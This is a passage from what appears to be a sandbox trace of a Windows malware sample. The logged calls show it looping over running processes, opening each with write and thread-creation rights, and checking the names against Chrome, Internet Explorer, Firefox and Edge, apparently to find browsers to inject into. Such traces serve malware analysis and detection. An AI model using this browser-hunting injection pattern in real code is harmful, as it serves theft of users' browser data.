	[0254.178] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0254.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xab80
	[0254.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.178] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0254.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.179] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.179] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0254.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.180] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.180] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xab84
	[0254.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.181] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.181] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.181] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.182] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.183] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xab88
	[0254.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.184] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.184] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.184] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.185] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xab8c
	[0254.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.186] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.186] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.187] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.187] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xab90
	[0254.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.188] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.188] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.189] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.189] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xab94
	[0254.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.190] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.191] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.191] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xab98
	[0254.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.192] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.193] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.193] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.193] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xab9c
	[0254.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.195] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.195] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.195] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.195] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xaba0
	[0254.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.196] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.197] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.197] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.197] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xaba4
	[0254.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.199] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.199] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.199] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.199] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xaba8
	[0254.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.200] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.201] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.201] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xabac
	[0254.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.203] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.203] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.203] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.204] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xabb0
	[0254.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.205] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.205] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.206] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.206] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xabb4
	[0254.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.207] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.207] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.208] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.208] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0254.209] CloseHandle (hObject=0x4fd0) returned 1
	[0254.209] Sleep (dwMilliseconds=0x64) 
	[0254.312] GetCurrentProcessId () returned 0x110
	[0254.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0254.316] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0254.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0254.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0254.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xabb8
	[0254.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.320] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.321] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.321] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.321] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xabbc
	[0254.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.323] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.324] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.324] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.325] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0254.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xabc0
	[0254.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.326] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0254.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.327] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.347] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0254.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.347] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xabc4
	[0254.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.348] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.349] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.349] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.349] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.349] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0254.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xabc8
	[0254.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.350] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0254.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.351] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.351] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0254.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.351] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0254.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xabcc
	[0254.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.352] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0254.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.353] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.353] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0254.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.354] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0254.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xabd0
	[0254.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.355] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0254.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.355] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.355] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0254.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.356] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0254.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xabd4
	[0254.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.357] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.357] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.357] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.357] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.358] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xabd8
	[0254.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.359] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.359] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.359] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.360] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xabdc
	[0254.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
